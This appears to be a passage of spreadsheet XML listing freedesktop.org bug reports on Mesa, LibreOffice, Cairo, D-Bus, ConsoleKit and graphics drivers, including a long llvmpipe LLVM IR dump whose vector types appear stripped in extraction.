 } XArc
-.De
+.EX
 .LP
 All x and y members are signed integers.
 The width and height members are 16-bit unsigned integers.</t>
  </si>
  <si>
    <t>CONSOLEKIT-23279</t>
  </si>
  <si>
    <t>ck-history for reboot shows (null)</t>
  </si>
  <si>
    <t>% ck-history --last-compat |grep reboot
reboot   system boot                   Wed Aug 12 18:55         (null)      
oops.</t>
  </si>
  <si>
    <t>MESA-102067</t>
  </si>
  <si>
    <t>Is it possible select a driver/implementation in an application? (like in OpenCL)</t>
  </si>
  <si>
    <t>This is not quite a question for Mesa.
However Linux graphics stack is sort of confusing and lack of documentation
and I don't know where to ask this question.
Is it possible for a application to enumerate and select the GL implementation
like in OpenCL?
In case of:
1. Mesa EGL.
   How to enumerate and select a GL vendor/implementation?
2. GLX.
   Is it possible to enumerate and select the GL drivers?
3. Wayland.
   Is Mesa EGL/DRI the only frontend/backend?
   (Or is there some way to load proprietary drivers?)</t>
  </si>
  <si>
    <t>myocytebd</t>
  </si>
  <si>
    <t>LIBREOFFICE-34023</t>
  </si>
  <si>
    <t>FILEOPEN: Particular WORD (97?) document can not be opened</t>
  </si>
  <si>
    <t>Created attachment 43088
a word97/2000 doc saved in OO 3.2
Could not open an old word95 file I got an error message that this was not a word97/2000 file. I was able to open it in OpenOffice 3.2 where I saved it in Word97/2000 format. I was still unable to open this file.
I have attached the file. The contents is in Russian.</t>
  </si>
  <si>
    <t>davesiberia</t>
  </si>
  <si>
    <t>LIBREOFFICE-43049</t>
  </si>
  <si>
    <t>foomatic options not supported no way to route phone num to custom cups fax driver</t>
  </si>
  <si>
    <t>Created attachment 53639
gedit fax printer dialog
I have a fax modem connection to a Linux machine (Debian).
The fax is connected using the efax package. However I built a foomatic-rip fax driver (attached) which allows me to enter a fax number.
This works fine with gedit but not with LibreOffice. As you can see from the attached screenshot the fax number field is not ready for input.
So it seems that LibreOffice doesn't understand the advanced foomatic-rip commands for custom input fields.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-1715</t>
  </si>
  <si>
    <t>I'll attach a patch to support the Cherry CyMotion Master XPress keyboard. 
This patch was commited to X.Org CVS as well.</t>
  </si>
  <si>
    <t>CAIRO-100029</t>
  </si>
  <si>
    <t>Broken pdf/ps output due to badly placed newline</t>
  </si>
  <si>
    <t>Created attachment 130021
Patch
In src/cairo-pdf-operators.c _word_wrap_stream_write might insert a newline into the output of _cairo_pdf_operators_emit_glyph_string_with_positioning in the middle of an escape sequence and result in a broken PDF (or PS) file.
The code responsible for this:
    if (*data == '\n' || stream-&gt;column &gt;= stream-&gt;max_column) {
        _cairo_output_stream_printf (stream-&gt;output \n)
        stream-&gt;column = 0
    } else if (*data == '&lt;') {
        stream-&gt;state = WRAP_STATE_HEXSTRING
    } else if (*data == '(') {
        stream-&gt;state = WRAP_STATE_STRING
    } else if (!_cairo_isspace (*data)) {
        stream-&gt;state = WRAP_STATE_WORD
    }
When the stream-&gt;column &gt;= stream-&gt;max_column case is hit stream-&gt;state doesn't get updated.
Here's a (simplified purged of private information) example of how this can be a problem:
[......................................................................27
(&lt;)................................................................-713(\
()...]TJ
After 27( the state didn't get changed to WRAP_STATE_STRING so it got incorrectly set to WRAP_STATE_HEXSTRING after the &lt;. The rest of the sequence was wrapped with hex-string rules and a newline was put in -713(\() exactly where it shouldn't be.</t>
  </si>
  <si>
    <t>jmmorlan</t>
  </si>
  <si>
    <t>MESA-30412</t>
  </si>
  <si>
    <t>opengl doesn't work when using gallium and xorg state tracker</t>
  </si>
  <si>
    <t>glxgears fails to run with the following error:
  Error: couldn't get an RGB Double-buffered visual</t>
  </si>
  <si>
    <t>DBUS-56043</t>
  </si>
  <si>
    <t>dbus-daemon loses journald sockets on restart and does not sanitise when subsequently calling dbus-daemon-launch-helper leading to SIGPIPE failures</t>
  </si>
  <si>
    <t>OK the summary is a bit long but it does at least explain things correctly!
This issue is a bit hard to describe but I'll do my best.
Versions: systemd 194 gnome-shell 3.6.1 dbus 1.6.8 fprintd 0.4.1
After a fresh boot login to gnome. fprintd is started via dbus activation at login and exits after a short timeout. If I lock the screen it is launched again when trying to unlock and again exits after a short timeout. I do not have any finger print h/w on this machine so this is largely unused by me but it operates correctly. Several lock+unlock attempts show now problems.
Then I restart the systemd journal: systemctl restart systemd-journald.service.
This is where things go wrong. I lock fine but when trying to unlock (slide the shield up) all I get is a blank screen - no dialog to enter my password. Why is this I hear you ask. Well gnome-shell ultimately tries to launch fprintd via dbus activation as before. dbus calls dbus-daemon-launch-helper to launch /usr/lib64/fprintd. This exits with SIGPIPE and bubbles up as an exception to gnome-shell. Now gnome-shell should be fixed to still show me the password dialog here but that's a separate issue the real issue is why the crash?
Well with some investigation the SIGPIPE is caused by fprintd output to stdout or stderr which is in the closed state.
Upon even further investigation fd's 1 and 2 are both sockets.
While I cannot confirm 100% it's my guess that dbus-daemon has simply lost it's connection to journald to which it's stdout/err are normally piped. When it then calls dbus-daemon-launch-helper it inherits these closed pipes and if any launched application then tries to output anything and hasn't called signal(SIG_PIPE SIG_IGN) itself then it will crash and this will bubble up the stack.
So suggested work arounds are:
1. When the stdout/err are closed try to re-establish connection to the journal.
 or
2. Sanitise stdout/err in dbus-launch-helper such that if they are closed then redirect them to /dev/null instead such that at least apps are started even if logging is sacrificed - i.e. make the best of a bad situation!
Hope this is clear but feel free to ask for clarification!</t>
  </si>
  <si>
    <t>LIBREOFFICE-57061</t>
  </si>
  <si>
    <t>Not all personal data imported during install from /3 User Profile</t>
  </si>
  <si>
    <t>The personal data folder changed from LOdev\3 to LOdev\4 but nothing was imported (and the now useless LOdev\3 folder was left behind...)
Maybe the \3 folder can be optionally left around (in case people want to go back). I would recommend that during install user input was  requested. Something like  Your personal data has been migrated to version 4. Would you like to remove the outdated personal folder?
NOTE: This was observed in Version 4.0.0.0.alpha0+ (Build ID: a2b3ee)
master~2012-11-13_06.07.28_LibO-Dev_4.0.0.0.alpha0_Win_x86_install_en-US
from Tinderbox Win-x86@6</t>
  </si>
  <si>
    <t>WAYLAND-98839</t>
  </si>
  <si>
    <t>Somehow conditionalize hysteresis (hardware black/whitelist device property introspection user-exposed setting etc)</t>
  </si>
  <si>
    <t>Created attachment 128175
Pivoting my finger around the tip but not getting appropriate precise cursor movement
With the patch from https://bugs.freedesktop.org/show_bug.cgi?id=90735 trackpad cursor movement is much improved for fast and medium-speed movements. But it's still sluggish and imprecise for very slow movements. To move the cursor 5-10 pixels should ideally be accomplishable with very subtle precise finger movement--such as pivoting your finger around the very tip without actually moving the tip. Pivoting your finger like this right now generally results in no cursor movement at all or jerky erratic movement.
I've attached an evemu recording of me pivoting my finger around its tip expecting to get very precise cursor movement but instead getting either nothing or erratic jerky movements.</t>
  </si>
  <si>
    <t>nate</t>
  </si>
  <si>
    <t>LIBREOFFICE-51278</t>
  </si>
  <si>
    <t>Opening Report fails with Error Message</t>
  </si>
  <si>
    <t>For me using 3.6 beta1 and beta2 it's just impossible to open reports in Base that were generated with LO 3.5.X.
I can't either create new reports. If I double click on the reports wizard I get an error message saying that no valid templates are found. OK that's an error that I had sometime ago that seems to happen to some people (looking in Google) but what is new to me is that if I double click on the option to create reports on design mode (which always worked before) this time it does nothing. Yes I double click on it and nothing happens.
On a previosly created .odb file (with 3.5.X) if I try to open a report I get an error saying something like: The document XXXXXX can't be opened (it's a translation that I've done from the spanish message I get it might not be exactly the same message on the pure english version). On this file if I then try to create new reports I get the same result than in the previous paragraph.
This is critical as Base becomes unusable on 3.6.</t>
  </si>
  <si>
    <t>aironmail</t>
  </si>
  <si>
    <t>SPECIFICATIONS-51258</t>
  </si>
  <si>
    <t>Include Pantheon as desktop environment</t>
  </si>
  <si>
    <t>Pantheon of elementary OS (https://launchpad.net/elementary and http://elementaryos.org) does not appear in the menu-spec (http://standards.freedesktop.org/menu-spec/menu-spec-1.0.html#onlyshowin-registry).</t>
  </si>
  <si>
    <t>cody</t>
  </si>
  <si>
    <t>DRI-93615</t>
  </si>
  <si>
    <t>Tonga does not recover from standby</t>
  </si>
  <si>
    <t>Standby worked flawlessly on my BARTS (radeon/r600). With the TONGA (amdgpu/radeonsi) the system is not able to recover after the standby. Seems like a hard-lockup.
I put my system into standby by doing:
  echo mem &gt; /sys/power/state
I tried both kernel 4.4-rc7 and the 4.5-drm-next branch.</t>
  </si>
  <si>
    <t>EoD</t>
  </si>
  <si>
    <t>MESA-72615</t>
  </si>
  <si>
    <t>[llvmpipe] piglit copyteximage 1D regression</t>
  </si>
  <si>
    <t>mesa: e84a1ab3c400f819408a7ebe01c2325cd59d94d3 (master)
$ ./bin/copyteximage 1D -auto
Testing GL_TEXTURE_1D
Texture target = GL_TEXTURE_1D Internal format = GL_RED
Illegal sampler view creation without bind flag
Texture target = GL_TEXTURE_1D Internal format = GL_RG
Illegal sampler view creation without bind flag
Texture target = GL_TEXTURE_1D Internal format = GL_RGB8
Illegal sampler view creation without bind flag
Texture target = GL_TEXTURE_1D Internal format = GL_RGB16
Illegal sampler view creation without bind flag
Texture target = GL_TEXTURE_1D Internal format = GL_RGB16F
Illegal sampler view creation without bind flag
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.stmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.stmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.ldmxcsr
Intrinsic has incorrect argument type!
void (i32*)* @llvm.x86.sse.ldmxcsr
Broken module found verification continues.
define void @fs5_variant4_partial({ [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* noalias %context i32 %x i32 %y i32 float* noalias %a0 float* noalias %dadx float* noalias %dady ** noalias %color_ptr_ptr i8* noalias %depth i32 %mask_input { i64 i32 }* noalias %thread_data i32* noalias %stride_ptr i32 %depth_stride) {
entry:
  %mxcsr_ptr10 = alloca i32
  %mxcsr_ptr = alloca i32
  %packed_var = alloca 
  %output8 = alloca 
  %output7 = alloca 
  %output6 = alloca 
  %output = alloca 
  %looplimiter = alloca i32
  %execution_mask = alloca 
  %color5 = alloca  i32 2
  %color4 = alloca  i32 2
  %color3 = alloca  i32 2
  %color = alloca  i32 2
  %loop_counter = alloca i32
  %1 = alloca 
  %2 = alloca 
  %3 = alloca 
  %4 = alloca 
  %5 = alloca 
  %6 = alloca 
  %mask_store = alloca  i32 2
  %7 = sitofp i32 %x to float
  %8 = sitofp i32 %y to float
  %9 = getelementptr float* %dadx i32 0
  %10 = bitcast float* %9 to *
  %pos.x.dadxaos = load * %10
  %11 = getelementptr float* %dady i32 0
  %12 = bitcast float* %11 to *
  %pos.x.dadyaos = load * %12
  %13 = getelementptr float* %a0 i32 0
  %14 = bitcast float* %13 to *
  %pos.x.a0aos = load * %14
  %15 = insertelement  undef float %7 i32 0
  %16 = shufflevector  %15  undef  zeroinitializer
  %17 = fmul  %16 %pos.x.dadxaos
  %18 = insertelement  undef float %8 i32 0
  %19 = shufflevector  %18  undef  zeroinitializer
  %20 = fmul  %19 %pos.x.dadyaos
  %21 = fadd  %pos.x.a0aos %20
  %22 = fadd  %21 %17
  %23 = fadd float %7 5.000000e-01
  %24 = insertelement  undef float %23 i32 0
  %25 = shufflevector  %24  undef  zeroinitializer
  %pos.x.a = fadd  %25 
  store  zeroinitializer * %6
  store  %pos.x.a * %6
  %26 = fadd float %8 5.000000e-01
  %27 = insertelement  undef float %26 i32 0
  %28 = shufflevector  %27  undef  zeroinitializer
  %pos.y.a = fadd  %28 
  store  zeroinitializer * %5
  store  %pos.y.a * %5
  %29 = shufflevector  %pos.x.dadxaos  undef  
  %30 = shufflevector  %pos.x.dadyaos  undef  
  %31 = shufflevector  %22  undef  
  %32 = fmul  %29 
  %33 = fmul  %30 
  %pos.z.dadq = fadd  %32 %33
  %34 = fadd  %pos.z.dadq %pos.z.dadq
  %pos.z.a = fadd  %31 %34
  store  zeroinitializer * %4
  store  %pos.z.a * %4
  %35 = shufflevector  %pos.x.dadxaos  undef  
  %36 = shufflevector  %pos.x.dadyaos  undef  
  %37 = shufflevector  %22  undef  
  %38 = fmul  %35 
  %39 = fmul  %36 
  %pos.w.dadq = fadd  %38 %39
  %40 = fadd  %pos.w.dadq %pos.w.dadq
  %pos.w.a = fadd  %37 %40
  store  zeroinitializer * %3
  store  %pos.w.a * %3
  %41 = getelementptr float* %dadx i32 4
  %42 = bitcast float* %41 to *
  %input0.x.dadxaos = load * %42
  %43 = getelementptr float* %dady i32 4
  %44 = bitcast float* %43 to *
  %input0.x.dadyaos = load * %44
  %45 = getelementptr float* %a0 i32 4
  %46 = bitcast float* %45 to *
  %input0.x.a0aos = load * %46
  %47 = insertelement  undef float %7 i32 0
  %48 = shufflevector  %47  undef  zeroinitializer
  %49 = fmul  %48 %input0.x.dadxaos
  %50 = insertelement  undef float %8 i32 0
  %51 = shufflevector  %50  undef  zeroinitializer
  %52 = fmul  %51 %input0.x.dadyaos
  %53 = fadd  %input0.x.a0aos %52
  %54 = fadd  %53 %49
  %55 = shufflevector  %input0.x.dadxaos  undef  zeroinitializer
  %56 = shufflevector  %input0.x.dadyaos  undef  zeroinitializer
  %57 = shufflevector  %54  undef  zeroinitializer
  %58 = fmul  %55 
  %59 = fmul  %56 
  %input0.x.dadq = fadd  %58 %59
  %60 = fadd  %input0.x.dadq %input0.x.dadq
  %input0.x.a = fadd  %57 %60
  store  zeroinitializer * %2
  store  %input0.x.a * %2
  %61 = shufflevector  %input0.x.dadxaos  undef  
  %62 = shufflevector  %input0.x.dadyaos  undef  
  %63 = shufflevector  %54  undef  
  %64 = fmul  %61 
  %65 = fmul  %62 
  %input0.y.dadq = fadd  %64 %65
  %66 = fadd  %input0.y.dadq %input0.y.dadq
  %input0.y.a = fadd  %63 %66
  store  zeroinitializer * %1
  store  %input0.y.a * %1
  %mask_ptr = getelementptr * %mask_store i32 0
  %67 = lshr i32 %mask_input 0
  %68 = insertelement  undef i32 %67 i32 0
  %69 = shufflevector  %68  undef  zeroinitializer
  %70 = and  %69 
  %71 = icmp ne  %70 zeroinitializer
  %72 = sext  %71 to 
  store  %72 * %mask_ptr
  %mask_ptr1 = getelementptr * %mask_store i32 1
  %73 = lshr i32 %mask_input 2
  %74 = insertelement  undef i32 %73 i32 0
  %75 = shufflevector  %74  undef  zeroinitializer
  %76 = and  %75 
  %77 = icmp ne  %76 zeroinitializer
  %78 = sext  %77 to 
  store  %78 * %mask_ptr1
  %context.stencil_ref_front_ptr = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 2
  %context.stencil_ref_front = load i32* %context.stencil_ref_front_ptr
  %context.stencil_ref_back_ptr = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 3
  %context.stencil_ref_back = load i32* %context.stencil_ref_back_ptr
  %context.constants_ptr = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 0
  store i32 0 i32* %loop_counter
  store i32 0 i32* %loop_counter
  br label %loop_begin
loop_begin:                                        preds = %skip %entry
  %79 = load i32* %loop_counter
  %80 = icmp ult i32 %79 2
  br i1 %80 label %loop_body label %loop_exit
loop_body:                                         preds = %loop_begin
  %mask_ptr2 = getelementptr * %mask_store i32 %79
  %81 = load * %mask_ptr2
  store  zeroinitializer * %execution_mask
  store  %81 * %execution_mask
  %82 = load * %execution_mask
  %83 = bitcast  %82 to i128
  %84 = icmp eq i128 %83 0
  br i1 %84 label %skip label %85
 :85                                       preds = %loop_body
  %86 = bitcast * %6 to float*
  %87 = getelementptr float* %86 i32 %79
  %88 = load float* %87
  %89 = insertelement  undef float %88 i32 0
  %90 = shufflevector  %89  undef  zeroinitializer
  %pos.x = fadd  %90 
  %91 = bitcast * %5 to float*
  %92 = getelementptr float* %91 i32 %79
  %93 = load float* %92
  %94 = insertelement  undef float %93 i32 0
  %95 = shufflevector  %94  undef  zeroinitializer
  %pos.y = fadd  %95 
  %96 = bitcast * %4 to float*
  %97 = getelementptr float* %96 i32 %79
  %98 = load float* %97
  %99 = insertelement  undef float %98 i32 0
  %100 = shufflevector  %99  undef  zeroinitializer
  %101 = fadd  %100 %pos.z.dadq
  %pos.z = call  @llvm.x86.sse.min.ps( %101  )
  %102 = bitcast * %3 to float*
  %103 = getelementptr float* %102 i32 %79
  %104 = load float* %103
  %105 = insertelement  undef float %104 i32 0
  %106 = shufflevector  %105  undef  zeroinitializer
  %pos.w = fadd  %106 %pos.w.dadq
  %107 = bitcast * %2 to float*
  %108 = getelementptr float* %107 i32 %79
  %109 = load float* %108
  %110 = insertelement  undef float %109 i32 0
  %111 = shufflevector  %110  undef  zeroinitializer
  %input0.x = fadd  %111 %input0.x.dadq
  %112 = bitcast * %1 to float*
  %113 = getelementptr float* %112 i32 %79
  %114 = load float* %113
  %115 = insertelement  undef float %114 i32 0
  %116 = shufflevector  %115  undef  zeroinitializer
  %input0.y = fadd  %116 %input0.y.dadq
  store i32 0 i32* %looplimiter
  store i32 65535 i32* %looplimiter
  store  zeroinitializer * %output
  store  zeroinitializer * %output6
  store  zeroinitializer * %output7
  store  zeroinitializer * %output8
  %117 = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 7 i32 0 i32 0
  %context.texture0.width = load i32* %117
  %context.texture0.row_stride = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 7 i32 0 i32 6
  %context.texture0.img_stride = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 7 i32 0 i32 7
  %118 = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 7 i32 0 i32 5
  %context.texture0.base_ptr = load i8** %118
  %context.texture0.mip_offsets = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 7 i32 0 i32 8
  %119 = insertelement  undef i32 %context.texture0.width i32 0
  %120 = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 7 i32 0 i32 1
  %context.texture0.height = load i32* %120
  %121 = insertelement  %119 i32 %context.texture0.height i32 1
  %122 = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 7 i32 0 i32 3
  %context.texture0.first_level = load i32* %122
  store  zeroinitializer * %packed_var
  %123 = insertelement  undef i32 %context.texture0.first_level i32 0
  %124 = shufflevector  %123  undef  zeroinitializer
  %minify = lshr  %121 %124
  %125 = call  @llvm.x86.sse41.pmaxsd( %minify  )
  %126 = getelementptr [14 x i32]* %context.texture0.row_stride i32 0 i32 %context.texture0.first_level
  %127 = load i32* %126
  %128 = insertelement  undef i32 %127 i32 0
  %129 = shufflevector  %128  undef  zeroinitializer
  %130 = getelementptr [14 x i32]* %context.texture0.mip_offsets i32 0 i32 %context.texture0.first_level
  %131 = load i32* %130
  %132 = getelementptr i8* %context.texture0.base_ptr i32 %131
  %133 = shufflevector  %125  undef  zeroinitializer
  %134 = shufflevector  %125  undef  
  %135 = shl  %125 
  %136 = sitofp  %135 to 
  %137 = shufflevector  %136  undef  zeroinitializer
  %138 = shufflevector  %136  undef  
  %139 = fmul  %input0.x %137
  %140 = fmul  %input0.y %138
  %141 = fptosi  %139 to 
  %142 = fptosi  %140 to 
  %143 = ashr  %141 
  %144 = ashr  %142 
  %145 = sub  %133 
  %146 = call  @llvm.x86.sse41.pmaxsd( %143  zeroinitializer)
  %147 = call  @llvm.x86.sse41.pminsd( %146  %145)
  %148 = mul  %147 
  %149 = sub  %134 
  %150 = call  @llvm.x86.sse41.pmaxsd( %144  zeroinitializer)
  %151 = call  @llvm.x86.sse41.pminsd( %150  %149)
  %152 = mul  %151 %129
  %153 = add  %148 %152
  %154 = extractelement  %153 i32 0
  %155 = getelementptr i8* %132 i32 %154
  %156 = bitcast i8* %155 to i32*
  %157 = load i32* %156
  %158 = insertelement  undef i32 %157 i32 0
  %159 = extractelement  %153 i32 1
  %160 = getelementptr i8* %132 i32 %159
  %161 = bitcast i8* %160 to i32*
  %162 = load i32* %161
  %163 = insertelement  %158 i32 %162 i32 1
  %164 = extractelement  %153 i32 2
  %165 = getelementptr i8* %132 i32 %164
  %166 = bitcast i8* %165 to i32*
  %167 = load i32* %166
  %168 = insertelement  %163 i32 %167 i32 2
  %169 = extractelement  %153 i32 3
  %170 = getelementptr i8* %132 i32 %169
  %171 = bitcast i8* %170 to i32*
  %172 = load i32* %171
  %173 = insertelement  %168 i32 %172 i32 3
  %174 = bitcast  %173 to 
  store  %174 * %packed_var
  %175 = load * %packed_var
  %176 = bitcast  %175 to 
  %177 = and  %176 
  %178 = sitofp  %177 to 
  %179 = fmul  %178 
  %180 = lshr  %176 
  %181 = and  %180 
  %182 = sitofp  %181 to 
  %183 = fmul  %182 
  %184 = lshr  %176 
  %185 = and  %184 
  %186 = sitofp  %185 to 
  %187 = fmul  %186 
  %188 = lshr  %176 
  %189 = sitofp  %188 to 
  %190 = fmul  %189 
  store  %187 * %output
  store  %183 * %output6
  store  %179 * %output7
  store  %190 * %output8
  %color0.r = load * %output
  %191 = getelementptr * %color i32 %79
  store  %color0.r * %191
  %color0.g = load * %output6
  %192 = getelementptr * %color3 i32 %79
  store  %color0.g * %192
  %color0.b = load * %output7
  %193 = getelementptr * %color4 i32 %79
  store  %color0.b * %193
  %color0.a = load * %output8
  %194 = getelementptr * %color5 i32 %79
  store  %color0.a * %194
  br label %skip
skip:                                              preds = %85 %loop_body
  %195 = load * %execution_mask
  store  %195 * %mask_ptr2
  %196 = add i32 %79 1
  store i32 %196 i32* %loop_counter
  br label %loop_begin
loop_exit:                                         preds = %loop_begin
  %197 = getelementptr * %mask_store i32 0
  %mask = load * %197
  %198 = getelementptr * %color i32 0
  %199 = getelementptr * %color3 i32 0
  %200 = getelementptr * %color4 i32 0
  %201 = getelementptr * %color5 i32 0
  %202 = getelementptr * %mask_store i32 1
  %mask9 = load * %202
  %203 = getelementptr * %color i32 1
  %204 = getelementptr * %color3 i32 1
  %205 = getelementptr * %color4 i32 1
  %206 = getelementptr * %color5 i32 1
  %207 = getelementptr ** %color_ptr_ptr i32 0
  %color_ptr0 = load ** %207
  %208 = getelementptr i32* %stride_ptr i32 0
  %209 = load i32* %208
  store i32 0 i32* %mxcsr_ptr
  call void @llvm.x86.sse.stmxcsr(i32* %mxcsr_ptr)
  store i32 0 i32* %mxcsr_ptr10
  call void @llvm.x86.sse.stmxcsr(i32* %mxcsr_ptr10)
  %mxcsr = load i32* %mxcsr_ptr10
  %210 = and i32 %mxcsr -32833
  store i32 %210 i32* %mxcsr_ptr10
  call void @llvm.x86.sse.ldmxcsr(i32* %mxcsr_ptr10)
  %211 = load * %201
  %212 = load * %198
  %213 = load * %199
  %214 = load * %200
  %215 = load * %206
  %216 = load * %203
  %217 = load * %204
  %218 = load * %205
  %219 = shufflevector  %212  %213  
  %220 = shufflevector  %214  %211  
  %221 = shufflevector  %212  %213  
  %222 = shufflevector  %214  %211  
  %t0 = bitcast  %219 to 
  %t1 = bitcast  %220 to 
  %t2 = bitcast  %221 to 
  %t3 = bitcast  %222 to 
  %223 = shufflevector  %t0  %t1  
  %224 = shufflevector  %t0  %t1  
  %225 = shufflevector  %t2  %t3  
  %226 = shufflevector  %t2  %t3  
  %dst0 = bitcast  %223 to 
  %dst1 = bitcast  %224 to 
  %dst2 = bitcast  %225 to 
  %dst3 = bitcast  %226 to 
  %227 = shufflevector  %216  %217  
  %228 = shufflevector  %218  %215  
  %229 = shufflevector  %216  %217  
  %230 = shufflevector  %218  %215  
  %t011 = bitcast  %227 to 
  %t112 = bitcast  %228 to 
  %t213 = bitcast  %229 to 
  %t314 = bitcast  %230 to 
  %231 = shufflevector  %t011  %t112  
  %232 = shufflevector  %t011  %t112  
  %233 = shufflevector  %t213  %t314  
  %234 = shufflevector  %t213  %t314  
  %dst015 = bitcast  %231 to 
  %dst116 = bitcast  %232 to 
  %dst217 = bitcast  %233 to 
  %dst318 = bitcast  %234 to 
  %context.f_blend_color_ptr = getelementptr { [16 x float*] float i32 i32 i8* float* { float float }* [32 x { i32 i32 i32 i32 i32 i8* [14 x i32] [14 x i32] [14 x i32] }] [16 x { float float float [4 x float] }] }* %context i32 0 i32 5
  %context.f_blend_color = load float** %context.f_blend_color_ptr
  %235 = bitcast float* %context.f_blend_color to *
  %236 = getelementptr * %235 i32 0
  %237 = load * %236
  %238 = shufflevector  %237  undef  
  %239 = shufflevector  %237  undef  
  %240 = bitcast  %mask to 
  %241 = bitcast  %mask9 to 
  %242 = shufflevector  %240  %241  
  %243 = shufflevector  %240  %241  
  %244 = bitcast  %242 to 
  %245 = bitcast  %243 to 
  %246 = extractelement  %245 i32 3
  %247 = extractelement  %245 i32 2
  %248 = extractelement  %245 i32 1
  %249 = extractelement  %245 i32 0
  %250 = extractelement  %244 i32 3
  %251 = extractelement  %244 i32 2
  %252 = extractelement  %244 i32 1
  %253 = extractelement  %244 i32 0
  %254 = sext i32 %253 to i96
  %255 = bitcast i96 %254 to 
  %256 = shufflevector  %255  undef  
  %257 = sext i32 %252 to i96
  %258 = bitcast i96 %257 to 
  %259 = shufflevector  %258  undef  
  %260 = sext i32 %251 to i96
  %261 = bitcast i96 %260 to 
  %262 = shufflevector  %261  undef  
  %263 = sext i32 %250 to i96
  %264 = bitcast i96 %263 to 
  %265 = shufflevector  %264  undef  
  %266 = sext i32 %249 to i96
  %267 = bitcast i96 %266 to 
  %268 = shufflevector  %267  undef  
  %269 = sext i32 %248 to i96
  %270 = bitcast i96 %269 to 
  %271 = shufflevector  %270  undef  
  %272 = sext i32 %247 to i96
  %273 = bitcast i96 %272 to 
  %274 = shufflevector  %273  undef  
  %275 = sext i32 %246 to i96
  %276 = bitcast i96 %275 to 
  %277 = shufflevector  %276  undef  
  %278 = bitcast  %211 to 
  %279 = bitcast  %215 to 
  %280 = shufflevector  %278  %279  
  %281 = shufflevector  %278  %279  
  %282 = bitcast  %280 to 
  %283 = bitcast  %281 to 
  %284 = extractelement  %283 i32 3
  %285 = extractelement  %283 i32 2
  %286 = extractelement  %283 i32 1
  %287 = extractelement  %283 i32 0
  %288 = extractelement  %282 i32 3
  %289 = extractelement  %282 i32 2
  %290 = extractelement  %282 i32 1
  %291 = extractelement  %282 i32 0
  %292 = insertelement  undef float %291 i32 0
  %293 = shufflevector  %292  undef  zeroinitializer
  %294 = insertelement  undef float %290 i32 0
  %295 = shufflevector  %294  undef  zeroinitializer
  %296 = insertelement  undef float %289 i32 0
  %297 = shufflevector  %296  undef  zeroinitializer
  %298 = insertelement  undef float %288 i32 0
  %299 = shufflevector  %298  undef  zeroinitializer
  %300 = insertelement  undef float %287 i32 0
  %301 = shufflevector  %300  undef  zeroinitializer
  %302 = insertelement  undef float %286 i32 0
  %303 = shufflevector  %302  undef  zeroinitializer
  %304 = insertelement  undef float %285 i32 0
  %305 = shufflevector  %304  undef  zeroinitializer
  %306 = insertelement  undef float %284 i32 0
  %307 = shufflevector  %306  undef  zeroinitializer
  %308 = mul i32 0 %209
  %309 = add i32 0 %308
  %310 = getelementptr * %color_ptr0 i32 0 i32 %309
  %311 = bitcast i8* %310 to *
  %312 = load * %311 align 2
  %313 = mul i32 0 %209
  %314 = add i32 6 %313
  %315 = getelementptr * %color_ptr0 i32 0 i32 %314
  %316 = bitcast i8* %315 to *
  %317 = load * %316 align 2
  %318 = mul i32 0 %209
  %319 = add i32 12 %318
  %320 = getelementptr * %color_ptr0 i32 0 i32 %319
  %321 = bitcast i8* %320 to *
  %322 = load * %321 align 2
  %323 = mul i32 0 %209
  %324 = add i32 18 %323
  %325 = getelementptr * %color_ptr0 i32 0 i32 %324
  %326 = bitcast i8* %325 to *
  %327 = load * %326 align 2
  %328 = shufflevector  %312  undef  
  %329 = shufflevector  %317  undef  
  %330 = shufflevector  %322  undef  
  %331 = shufflevector  %327  undef  
  %332 = zext  %328 to 
  %333 = shl  %332 
  %334 = and  %333 
  %335 = bitcast  %334 to 
  %336 = fmul  %335 
  %337 = fcmp uge  %335 
  %338 = sext  %337 to 
  %339 = bitcast  %336 to 
  %340 = and   %338
  %341 = or  %340 %339
  %342 = shl  %333 
  %343 = and   %342
  %344 = or  %341 %343
  %345 = bitcast  %344 to 
  %346 = zext  %329 to 
  %347 = shl  %346 
  %348 = and  %347 
  %349 = bitcast  %348 to 
  %350 = fmul  %349 
  %351 = fcmp uge  %349 
  %352 = sext  %351 to 
  %353 = bitcast  %350 to 
  %354 = and   %352
  %355 = or  %354 %353
